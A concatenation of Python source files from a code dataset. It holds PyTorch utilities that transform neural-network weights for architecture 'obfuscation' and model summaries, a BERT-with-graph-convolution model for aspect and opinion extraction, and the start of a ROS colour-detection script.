state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 1:\n result = next((True for line in buf if \"decompo_list[{}] == 1\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:int(orig_shape[0]/2), :, :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = orig_weight[int(orig_shape[0]/2):, :, :, :]\n if if_bias:\n state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias[:int(orig_shape[0]/2)]\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias[int(orig_shape[0]/2):]\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 2:\n result = next((True for line in buf if \"decompo_list[{}] == 2\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:int(orig_shape[0]/4), :, :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = orig_weight[int(orig_shape[0]/4):int(orig_shape[0]/2), :, :, :]\n state_dict[\"{}_2.weight\".format(conv_name)] = orig_weight[int(orig_shape[0]/2):int(3*orig_shape[0]/4), :, :, :]\n state_dict[\"{}_3.weight\".format(conv_name)] = orig_weight[int(3*orig_shape[0]/4):, :, :, :]\n if if_bias:\n state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias[:int(orig_shape[0]/4)]\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias[int(orig_shape[0]/4):int(orig_shape[0]/2)]\n state_dict[\"{}_2.bias\".format(conv_name)] = orig_bias[int(orig_shape[0]/2):int(3*orig_shape[0]/4)]\n state_dict[\"{}_3.bias\".format(conv_name)] = orig_bias[int(3*orig_shape[0]/4):]\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 3:\n result = next((True for line in buf if \"decompo_list[{}] == 3\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:, :int(orig_shape[1]/2), :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = orig_weight[:, int(orig_shape[1]/2):, :, :]\n if if_bias:\n state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias/2\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias/2\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 4:\n result = next((True for line in buf if \"decompo_list[{}] == 4\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:, :int(orig_shape[1]/4), :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = orig_weight[:, int(orig_shape[1]/4):int(orig_shape[1]/2), :, :]\n state_dict[\"{}_2.weight\".format(conv_name)] = orig_weight[:, int(orig_shape[1]/2):int(3*orig_shape[1]/4), :, :]\n state_dict[\"{}_3.weight\".format(conv_name)] = orig_weight[:, int(3*orig_shape[1]/4):, :, :]\n if if_bias:\n state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias/4\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias/4\n state_dict[\"{}_2.bias\".format(conv_name)] = orig_bias/4\n state_dict[\"{}_3.bias\".format(conv_name)] = orig_bias/4\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n\n\n elif \"fc\" in modify_list[i] or \"classifier\" in modify_list[i]:\n j += 1\n '''Modify widen_list (fc)'''\n if (widen_list[j] > 1) and (j < len(widen_list) - 1): #layer_widening, do not do to the last fc layer\n orig_weight = state_dict[\"{}.weight\".format(modify_list[i])]\n orig_shape = orig_weight.size()\n orig_bias = state_dict[\"{}.bias\".format(modify_list[i])]\n bn_name = \"fc_bn\" + modify_list[i].split(\"c\")[1]\n if (j < len(widen_list) - 2):\n next_fc_name = \"fc\" + str(int(modify_list[i].split(\"c\")[1]) + 1)\n else:\n next_fc_name = \"classifier\"\n orig_next_weight = state_dict['{}.weight'.format(next_fc_name)]\n\n extra_c = int(np.floor(orig_shape[0] *(widen_list[j] - np.floor(widen_list[j]))/4)*4) # get float part\n mul_factor = int(np.floor(widen_list[j])) # get int\n\n state_dict['{}.weight'.format(modify_list[i])] = torch.cat([orig_weight[:extra_c, :].repeat_interleave(mul_factor+1,0), orig_weight[extra_c:, :].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.bias'.format(modify_list[i])] = torch.cat([orig_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n result = next((True for line in buf if bn_name in line), False)\n result2 = next((True for line in buf if (bn_name in line) and (\"affine=False\" in line)), False)\n if result:\n orig_bn_weight = state_dict['{}.weight'.format(bn_name)]\n orig_bn_bias = state_dict['{}.bias'.format(bn_name)]\n orig_bn_running_mean = state_dict['{}.running_mean'.format(bn_name)]\n orig_bn_running_var = state_dict['{}.running_var'.format(bn_name)]\n if not result2:\n state_dict['{}.weight'.format(bn_name)] = torch.cat([orig_bn_weight[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_weight[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.bias'.format(bn_name)] = torch.cat([orig_bn_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_mean'.format(bn_name)] = torch.cat([orig_bn_running_mean[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_mean[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_var'.format(bn_name)] = torch.cat([orig_bn_running_var[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_var[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.weight'.format(next_fc_name)] = torch.cat([orig_next_weight[:, :extra_c].repeat_interleave(mul_factor+1,1)/(mul_factor+1), orig_next_weight[:, extra_c:].repeat_interleave(mul_factor,1)/mul_factor], 1)\n\n\n '''Modify deepen_list (fc)'''\n if deepen_list[j] == 1: #layer_deepening\n state_dict['{}_dp.weight'.format(modify_list[i])] = torch.eye(state_dict['{}.weight'.format(modify_list[i])].size()[0])\n state_dict['{}_dp.bias'.format(modify_list[i])] = torch.zeros_like(state_dict['{}.bias'.format(modify_list[i])])\n\n '''Modify skipcon_list (fc)'''\n if skipcon_list[j] == 1: #skip_connection\n orig_weight_shape = state_dict[\"{}.weight\".format(modify_list[i])].size()\n state_dict['{}_sk.weight'.format(modify_list[i])] = torch.zeros([orig_weight_shape[0], orig_weight_shape[0]])\n state_dict['{}_sk.bias'.format(modify_list[i])] = torch.zeros_like(state_dict['{}.bias'.format(modify_list[i])])\n\n '''Modify decompo_list (fc)'''\n orig_weight = state_dict[\"{}.weight\".format(modify_list[i])]\n orig_shape = orig_weight.size()\n orig_bias = state_dict[\"{}.bias\".format(modify_list[i])]\n state_dict.pop(\"{}.weight\".format(modify_list[i]), None)\n state_dict.pop(\"{}.bias\".format(modify_list[i]), None)\n if decompo_list[j] == 1:\n result = next((True for line in buf if \"decompo_list[{}] == 1\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[:int(orig_shape[0]/2), :]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias[:int(orig_shape[0]/2)]\n state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[int(orig_shape[0]/2):, :]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias[int(orig_shape[0]/2):]\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n elif decompo_list[j] == 2:\n result = next((True for line in buf if \"decompo_list[{}] == 2\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[:int(orig_shape[0]/4), :]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias[:int(orig_shape[0]/4)]\n state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[int(orig_shape[0]/4):int(orig_shape[0]/2), :]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias[int(orig_shape[0]/4):int(orig_shape[0]/2)]\n state_dict[\"{}_2.weight\".format(modify_list[i])] = orig_weight[int(orig_shape[0]/2):int(3*orig_shape[0]/4), :]\n state_dict[\"{}_2.bias\".format(modify_list[i])] = orig_bias[int(orig_shape[0]/2):int(3*orig_shape[0]/4)]\n state_dict[\"{}_3.weight\".format(modify_list[i])] = orig_weight[int(3*orig_shape[0]/4):, :]\n state_dict[\"{}_3.bias\".format(modify_list[i])] = orig_bias[int(3*orig_shape[0]/4):]\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n elif decompo_list[j] == 3:\n result = next((True for line in buf if \"decompo_list[{}] == 3\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[: , :int(orig_shape[1]/2)]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias/2\n state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[: , int(orig_shape[1]/2):]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias/2\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n elif decompo_list[j] == 4:\n result = next((True for line in buf if \"decompo_list[{}] == 4\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[: , :int(orig_shape[1]/4)]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias/4\n state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[: , int(orig_shape[1]/4):int(orig_shape[1]/2)]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias/4\n state_dict[\"{}_2.weight\".format(modify_list[i])] = orig_weight[: , int(orig_shape[1]/2):int(3 * orig_shape[1]/4)]\n state_dict[\"{}_2.bias\".format(modify_list[i])] = orig_bias/4\n state_dict[\"{}_3.weight\".format(modify_list[i])] = orig_weight[: , int(3 * orig_shape[1]/4):]\n state_dict[\"{}_3.bias\".format(modify_list[i])] = orig_bias/4\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n return state_dict\n\n'''We are identifying a _obf model file to derive the search space. i.e. len(decompo_list)'''\ndef identify_model(model_log_file, forbid1x1 = False):\n num_conv = 0\n num_linear = 0\n modify_list = [\"reshape\"]\n kerneladd_list = []\n decompo_list = []\n with open(model_log_file, \"r\") as in_file:\n buf = in_file.readlines()\n for line in buf:\n if \"Conv2d\" in line:\n if forbid1x1:\n if \"(1x1)\" not in line:\n modify_list.append(\"conv{}\".format(num_conv))\n decompo_list.append(0)\n kerneladd_list.append(0)\n else:\n modify_list.append(\"conv{}\".format(num_conv))\n decompo_list.append(0)\n kerneladd_list.append(0)\n num_conv += 1\n elif \"Linear\" in line:\n if num_linear == 0:\n modify_list.append(\"reshape\")\n if \"[-1, 10]\" in line or \"[-1, 100]\" in line or \"[-1, 1000]\" in line:\n modify_list.append(\"classifier\")\n decompo_list.append(0)\n num_linear += 1\n else:\n modify_list.append(\"fc{}\".format(num_linear))\n decompo_list.append(0)\n num_linear += 1\n elif \"Pool\" in line:\n modify_list.append(\"maxpool\")\n elif \"LogSoftmax\" in line:\n modify_list.append(\"softmax\")\n return modify_list, decompo_list, kerneladd_list\n\n'''This funciton adds more entry to allow more fusable operation (after obfuscation, the number of fusion node increases accordingly, see misc/copy2tvm/tvm/src/transforms/fuse_ops.cc)'''\ndef get_extra_entries(decompo_list, dummy_list, deepen_list, skipcon_list):\n #other list could also bring more entries. number of entry decompo list could bring is been offseted by +3.\n result = sum(dummy_list)\n result += 4 * (sum(deepen_list) + sum(skipcon_list))\n for i in range(len(decompo_list)):\n if decompo_list[i] == 1:\n result += 4\n elif decompo_list[i] == 3:\n result += 10\n elif decompo_list[i] == 2:\n result += 6\n elif decompo_list[i] == 4:\n result += 17\n return result\n\n\ndef setup_logger(name, log_file, level=logging.INFO, console_out = False):\n \"\"\"To setup as many loggers as you want\"\"\"\n\n handler = logging.FileHandler(log_file, mode='w')\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n if console_out:\n stdout_handler = logging.StreamHandler(sys.stdout)\n logger.addHandler(stdout_handler)\n return logger\n\ndef summary(model, input_size, batch_size=-1, device=torch.device('cuda:0'), dtypes=None):\n result, params_info = summary_string(model, input_size, batch_size, device, dtypes)\n return result\n\ndef summary_string(model, input_size, batch_size=-1, device=torch.device('cuda:0'), dtypes=None):\n if dtypes == None:\n dtypes = [torch.FloatTensor]*len(input_size)\n\n summary_str = ''\n\n def register_hook(module):\n def hook(module, input, output):\n class_name = str(module.__class__).split(\".\")[-1].split(\"'\")[0]\n module_idx = len(summary)\n\n m_key = \"%s-%i\" % (class_name, module_idx + 1)\n summary[m_key] = OrderedDict()\n summary[m_key][\"input_shape\"] = list(input[0].size())\n summary[m_key][\"input_shape\"][0] = batch_size\n if isinstance(output, (list, tuple)):\n summary[m_key][\"output_shape\"] = [\n [-1] + list(o.size())[1:] for o in output\n ]\n else:\n summary[m_key][\"output_shape\"] = list(output.size())\n summary[m_key][\"output_shape\"][0] = batch_size\n\n params = 0\n if hasattr(module, \"weight\") and hasattr(module.weight, \"size\"):\n params += torch.prod(torch.LongTensor(list(module.weight.size())))\n summary[m_key][\"trainable\"] = module.weight.requires_grad\n summary[m_key][\"weight_shape\"] = list(module.weight.size())\n if hasattr(module, \"bias\") and hasattr(module.bias, \"size\"):\n params += torch.prod(torch.LongTensor(list(module.bias.size())))\n summary[m_key][\"nb_params\"] = params\n\n if (\n not isinstance(module, nn.Sequential)\n and not isinstance(module, nn.ModuleList)\n ):\n hooks.append(module.register_forward_hook(hook))\n\n # multiple inputs to the network\n if isinstance(input_size, tuple):\n input_size = [input_size]\n\n # batch_size of 2 for batchnorm\n x = [torch.rand(2, *in_size).type(dtype).to(device=device)\n for in_size, dtype in zip(input_size, dtypes)]\n\n # create properties\n summary = OrderedDict()\n hooks = []\n\n # register hook\n model.apply(register_hook)\n\n # make a forward pass\n # print(x.shape)\n model(*x)\n\n # remove these hooks\n for h in hooks:\n h.remove()\n\n summary_str += \"----------------------------------------------------------------\" + \"\\n\"\n line_new = \"{:>20} {:>25} {:>15}\".format(\n \"Layer (type)\", \"Output Shape\", \"Param #\")\n summary_str += line_new + \"\\n\"\n summary_str += \"================================================================\" + \"\\n\"\n total_params = 0\n total_output = 0\n trainable_params = 0\n for layer in summary:\n # input_shape, output_shape, trainable, nb_params\n # line_new = \"{:>20} {:>25} {:>15}\".format(\n # layer,\n # str(summary[layer][\"output_shape\"]),\n # \"{0:,}\".format(summary[layer][\"nb_params\"]),\n # )\n if \"weight_shape\" in summary[layer]:\n if len(summary[layer][\"weight_shape\"]) == 4:\n kernel_size = summary[layer][\"weight_shape\"][-1]\n else:\n kernel_size = \"x\"\n else:\n kernel_size = \"x\"\n\n line_new = \"{:>20} {:>25} {:>15}\".format(\n layer + \" ({}x{})\".format(kernel_size, kernel_size),\n str(summary[layer][\"output_shape\"]),\n \"{0:,}\".format(summary[layer][\"nb_params\"]),\n )\n total_params += summary[layer][\"nb_params\"]\n\n total_output += np.prod(summary[layer][\"output_shape\"])\n if \"trainable\" in summary[layer]:\n if summary[layer][\"trainable\"] == True:\n trainable_params += summary[layer][\"nb_params\"]\n summary_str += line_new + \"\\n\"\n\n # assume 4 bytes/number (float on cuda).\n total_input_size = abs(np.prod(sum(input_size, ()))\n * batch_size * 4. / (1024 ** 2.))\n total_output_size = abs(2. * total_output * 4. /\n (1024 ** 2.)) # x2 for gradients\n total_params_size = abs(total_params * 4. / (1024 ** 2.))\n total_size = total_params_size + total_output_size + total_input_size\n\n summary_str += \"================================================================\" + \"\\n\"\n summary_str += \"Total params: {0:,}\".format(total_params) + \"\\n\"\n summary_str += \"Trainable params: {0:,}\".format(trainable_params) + \"\\n\"\n summary_str += \"Non-trainable params: {0:,}\".format(total_params -\n trainable_params) + \"\\n\"\n summary_str += \"----------------------------------------------------------------\" + \"\\n\"\n summary_str += \"Input size (MB): %0.2f\" % total_input_size + \"\\n\"\n summary_str += \"Forward/backward pass size (MB): %0.2f\" % total_output_size + \"\\n\"\n summary_str += \"Params size (MB): %0.2f\" % total_params_size + \"\\n\"\n summary_str += \"Estimated Total Size (MB): %0.2f\" % total_size + \"\\n\"\n summary_str += \"----------------------------------------------------------------\" + \"\\n\"\n # return summary\n return summary_str, (total_params, trainable_params)","sub_path":"seq_obfuscator/torch_utils.py","file_name":"torch_utils.py","file_ext":"py","file_size_in_byte":27401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"308785707","text":"# -*- coding: utf-8 -*-\n\nfrom layers.dynamic_rnn import DynamicLSTM\nimport torch\nimport torch.nn as nn\nimport pdb\nimport torch.nn.functional as F\nfrom transformers import AutoModel, AutoTokenizer\nfrom transformers import BertForTokenClassification\n# from transformers import BertModel, BertTokenizer\n\ndef generate_formal_adj(init_adj):\n '''input: a simple adj with a size of (row, column)\n output: a complete and formal adj with a size of (row+column, row+column)'''\n batch, row, column = init_adj.shape\n # up left matrix (batch, row, row)\n lu = torch.tensor(np.zeros((batch, row, row)).astype('float32')).cuda()\n # up right (batch, row, column)\n ru = init_adj.cuda()\n # down left (batch, column, row)\n ld = init_adj.transpose(1, 2).cuda()\n # down right (batch, column, column)\n rd = torch.tensor(np.zeros((batch, column, column)).astype('float32')).cuda()\n # up (batch, row, row+column)\n up = torch.cat([lu.float(), ru.float()], -1).cuda()\n # down (batch, column, row+column)\n down = torch.cat([ld.float(), rd.float()], -1).cuda()\n # final (batch, row+column, row+column)\n final = torch.cat([up,down],1).cuda()\n return final.cuda()\n\ndef preprocess_adj(A):\n '''\n for batch data\n Pre-process adjacency matrix\n :param A: adjacency matrix\n :return:\n '''\n # prepare\n assert A.shape[-1] == A.shape[-2]\n batch = A.shape[0]\n num = A.shape[-1]\n # generate eye\n I = torch.eye(num).unsqueeze(0).repeat(batch, 1, 1).cuda()\n # \n A_hat = A.cuda() + I\n #\n D_hat_diag = torch.sum(A_hat.cuda(), axis=-1)\n # \n D_hat_diag_inv_sqrt = torch.pow(D_hat_diag.cuda(), -0.5)\n # inf \n D_hat_diag_inv_sqrt = torch.where(torch.isinf(D_hat_diag_inv_sqrt.cuda()), torch.full_like(D_hat_diag_inv_sqrt.cuda(), 0), D_hat_diag_inv_sqrt.cuda())\n D_hat_diag_inv_sqrt = torch.where(torch.isnan(D_hat_diag_inv_sqrt.cuda()), torch.full_like(D_hat_diag_inv_sqrt.cuda(), 0), D_hat_diag_inv_sqrt.cuda())\n # \n tem_I = torch.eye(num).unsqueeze(0).repeat(batch, 1, 1).cuda()\n D_hat_diag_inv_sqrt_ = D_hat_diag_inv_sqrt.unsqueeze(-1).repeat(1,1,num).cuda()\n D_hat_inv_sqrt = D_hat_diag_inv_sqrt_ * tem_I\n # \n return torch.matmul(torch.matmul(D_hat_inv_sqrt.cuda(), A_hat.cuda()), D_hat_inv_sqrt.cuda())\n\nclass SequenceLabelForAO(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(SequenceLabelForAO, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_obj = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n sub_output = self.hidden2tag_sub(features_tmp)\n obj_output = self.hidden2tag_obj(features_tmp)\n return sub_output, obj_output\n\nclass CustomizeSequenceLabelForAO(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(CustomizeSequenceLabelForAO, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_obj = nn.Linear(hidden_size, int(hidden_size / 2))\n self.linear_a = nn.Linear(hidden_size, self.tag_size)\n self.linear_o = nn.Linear(hidden_size, self.tag_size)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n # share\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n # ATE\n features_tmp_a = self.hidden2tag_sub(input_features)\n features_tmp_a = nn.ReLU()(features_tmp)\n features_tmp_a = self.dropout(features_tmp)\n # OTE\n features_tmp_o = self.hidden2tag_obj(input_features)\n features_tmp_o = nn.ReLU()(features_tmp)\n features_tmp_o = self.dropout(features_tmp)\n # cat \n features_for_a = torch.cat([features_tmp, features_tmp_a], -1)\n features_for_o = torch.cat([features_tmp, features_tmp_o], -1)\n # classifier\n sub_output = self.linear_a(features_for_a)\n obj_output = self.linear_a(features_for_o)\n\n return sub_output, obj_output\n\nclass SequenceLabelForAOS(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(SequenceLabelForAOS, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_obj = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_senti = nn.Linear(int(hidden_size / 2), self.tag_size+1)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n sub_output = self.hidden2tag_sub(features_tmp)\n obj_output = self.hidden2tag_obj(features_tmp)\n senti_output = self.hidden2tag_senti(features_tmp)\n return sub_output, obj_output, senti_output\n\nclass SequenceLabelForTriple(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(SequenceLabelForTriple, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_obj = nn.Linear(int(hidden_size / 2), self.tag_size+1)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n sub_output = self.hidden2tag_sub(features_tmp)\n obj_output = self.hidden2tag_obj(features_tmp)\n return sub_output, obj_output\n\nclass MultiNonLinearClassifier(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(MultiNonLinearClassifier, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n features_output = self.hidden2tag(features_tmp)\n return features_output\n\nclass GraphConvolution(nn.Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = nn.Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n\n def forward(self, text, adj):\n hidden = torch.matmul(text, self.weight)\n denom = torch.sum(adj, dim=2, keepdim=True) + 1\n # adj = torch.tensor(adj)\n adj = torch.tensor(adj, dtype=torch.float32)\n # hidden = torch.tensor(hidden)\n hidden = torch.tensor(hidden, dtype=torch.float32)\n output = torch.matmul(adj.cuda(), hidden.cuda()) / denom.cuda()\n # print(output.shape)\n # print(self.bias.shape)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\nclass PairGeneration(nn.Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n def __init__(self, features, bias=False):\n super(PairGeneration, self).__init__() # 32,13,300 32,300,13\n self.features = features\n # self.out_features = out_features\n self.weight = nn.Parameter(torch.FloatTensor(features, features))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(features))\n else:\n self.register_parameter('bias', None)\n\n def forward(self, text):\n hidden = torch.matmul(text.float(), self.weight)\n # print(hidden.shape)\n # denom = torch.sum(adj, dim=2, keepdim=True) + 1\n # adj = torch.tensor(adj, dtype=torch.float32)\n hidden_ = torch.tensor(hidden, dtype=torch.float32)\n # print(hidden_.shape)\n output = torch.matmul(hidden_, hidden.permute(0,2,1))\n # print(output.shape)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\nclass PairGeneration0(nn.Module):\n def __init__(self, features, bias=False):\n super(PairGeneration0, self).__init__() # 32,13,300 32,300,13\n self.features = features\n # self.out_features = out_features\n self.weight = nn.Parameter(torch.FloatTensor(features, features))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(features))\n else:\n self.register_parameter('bias', None)\n\n def forward(self, text):\n hidden_1 = torch.unsqueeze(text,1).repeat(1,text.shape[1],1,1)\n hidden_2 = torch.unsqueeze(text,2).repeat(1,1,text.shape[1],1)\n output = torch.cat((hidden_1, hidden_2),-1)\n return output\n\nclass BERT_GCN(nn.Module):\n def __init__(self, opt, freeze_bert = False):\n super(BERT_GCN, self).__init__()\n pretrained_model = opt.bert_type\n # 'roberta-base', 'roberta-large', 'bert-base-uncased', 'bert-large-uncased'\n dim_dic = {'roberta-base': 768, 'roberta-large': 1024, 'bert-base-uncased': 768, 'bert-large-uncased':1024}\n self.dim = dim_dic[pretrained_model]\n self.opt = opt\n self.tokenizer = AutoTokenizer.from_pretrained(pretrained_model)\n self.bert_model = AutoModel.from_pretrained(pretrained_model)\n if freeze_bert:\n for param in self.bert_model.parameters():\n param.requires_grad = False\n\n self.text_embed_dropout = nn.Dropout(0.5)\n self.pairgeneration = PairGeneration0(self.dim)\n # new classifier \n self.aspect_opinion_classifier = SequenceLabelForAO(self.dim, 3, 0.5)\n self.triple_classifier = SequenceLabelForTriple(self.dim*2, 3, 0.5)\n\n self.aspect_classifier = nn.Linear(self.dim, 3)\n self.opinion_classifier = nn.Linear(self.dim, 3)\n self.pair_classifier = nn.Linear(self.dim*2, 3)\n self.pair_sentiment_classifier = nn.Linear(self.dim*2, 4)\n print('bert_gcn!!!')\n\n def forward(self, inputs, mask):\n # input\n text_indices, mask, aspect_labels, opinion_labels, pair_labels, triple_labels = inputs\n # prepare\n batch_size = text_indices.shape[0]\n sentence_len = text_indices.shape[1]\n # get sentence mask\n mask_ = torch.unsqueeze(mask, -1)\n # input sentnece s_0\n word_embeddings = self.bert_model(text_indices, mask)[0]\n text_out = self.text_embed_dropout(word_embeddings)\n # pair generation\n pair_text = self.pairgeneration(text_out)\n # AE and OE scores\n aspect_probs, opinion_probs = self.aspect_opinion_classifier(text_out.float())\n # aspect_probs, opinion_probs = self.aspect_classifier(text_out.float()), self.opinion_classifier(text_out.float())\n aspect_probs, opinion_probs = aspect_probs.contiguous().view(-1, 3), opinion_probs.contiguous().view(-1, 3)\n\n pair_probs_, pair_sentiment_probs_ = self.triple_classifier(pair_text.float())\n # pair_probs_, pair_sentiment_probs_ = self.pair_classifier(pair_text.float()), self.pair_sentiment_classifier(pair_text.float())\n pair_probs = pair_probs_.contiguous().view(-1, 3)\n pair_sentiment_probs = pair_sentiment_probs_.contiguous().view(-1, 4)\n\n return aspect_probs, opinion_probs, pair_probs, pair_sentiment_probs","sub_path":"bert_models/bert_init.py","file_name":"bert_init.py","file_ext":"py","file_size_in_byte":12745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162102632","text":"import message_filters\nfrom std_msgs.msg import Int32, Float32\nimport rospy\nfrom sensor_msgs.msg import CompressedImage\nfrom sensor_msgs.msg import LaserScan\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\n\n#define the list of boundaries\nboundaries = [\n\t([17, 15, 100], [50, 56, 200]),\n\t([86, 31, 4], [220, 88, 50]),\n\t([25, 146, 190], [62, 174, 250]),\n\t([103, 86, 65], [145, 133, 128])\n]\n\nlowerRedBoundary = np.array([17, 15, 100], dtype = \"uint8\")\nupperRedBoundary = np.array([50, 56, 200], dtype = \"uint8\")\n\ndef callback(distance, image):\n print(distance.ranges[0])\n bridge = CvBridge()\n try:\n cv_image = bridge.compressed_imgmsg_to_cv2(image)\n except CvBridgeError as e:\n print(e)\n\n hsv_frame = cv2.cvtColor(cv_image, 